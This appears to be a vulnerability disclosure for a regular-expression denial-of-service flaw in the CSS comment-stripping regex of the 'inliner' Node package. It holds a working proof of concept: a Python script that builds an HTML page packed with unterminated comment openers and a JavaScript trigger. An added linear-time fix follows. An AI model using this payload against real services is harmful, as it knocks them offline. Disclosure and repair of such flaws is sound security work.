Description
The program compresses the CSS in the HTML file returned by the server, which calls the `compress` function in css.js. This function uses the regex `\/\*.*?\*\/` to remove the comments in CSS. There exists a ReDoS vulnerability in this regex when we call it on the `replace` method.
PoC
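I generate the attackable HTML file using the python3 script below:
```python
# Build an HTML page whose <style> block holds 50000 unterminated "/*" openers
s = '''<!DOCTYPE html><html> <head><style>{}</style> </head> <body> <h1>This is a heading</h1> <p>This is a paragraph.</p> </body></html>'''.format("/*\u0008\u0008\u0008" * 50000 + "\n\n\n\t\n")
# Write the page to disk; the with-block flushes and closes the file
with open("./index.html", "w", encoding="utf-8", newline=None) as f:
    f.write(s)
```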
Then I trigger the ReDoS vulnerability using the js script below. The script will take a long time to complete.
```javascript
var Inliner = require('inliner');
// Fetch the page served from index.html; inlining runs the CSS compress step
var s = new Inliner('http://127.0.0.1/', function (error, html) {
  console.log(html);
});
```
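An added example, not part of the original issue and not inliner's own code: one way to strip CSS comments without the regex, using a single forward scan with `indexOf` so a long run of unterminated `/*` openers costs linear time. The name `stripCssComments` is hypothetical, and unlike the regex (where `.` stops at line terminators) it also removes comments that span lines.

```javascript
// Added example (hypothetical helper, not inliner's code).
// Removes /* ... */ comments in one forward pass: every character is
// visited a bounded number of times, so there is no backtracking blow-up.
function stripCssComments(css) {
  let out = '';
  let pos = 0;
  while (pos < css.length) {
    const open = css.indexOf('/*', pos);
    if (open === -1) break; // no more comment openers
    const close = css.indexOf('*/', open + 2);
    // No terminator anywhere ahead means no later "/*" can close either,
    // so stop scanning and keep the remainder unchanged (as the regex does).
    if (close === -1) break;
    out += css.slice(pos, open); // keep the text before the comment
    pos = close + 2;             // resume after the terminator
  }
  return out + css.slice(pos);
}

// Constructed sample inputs, including the shape used in the PoC above.
const samples = [
  'a{color:red}/* note */b{color:blue}',
  'p{margin:0}/* first */ /* second */',
  '/*\u0008\u0008\u0008'.repeat(50000) + '\n\n\n\t\n',
];
for (const css of samples) {
  const started = Date.now();
  const result = stripCssComments(css);
  console.log(css.length, '->', result.length, 'chars in', Date.now() - started, 'ms');
}
```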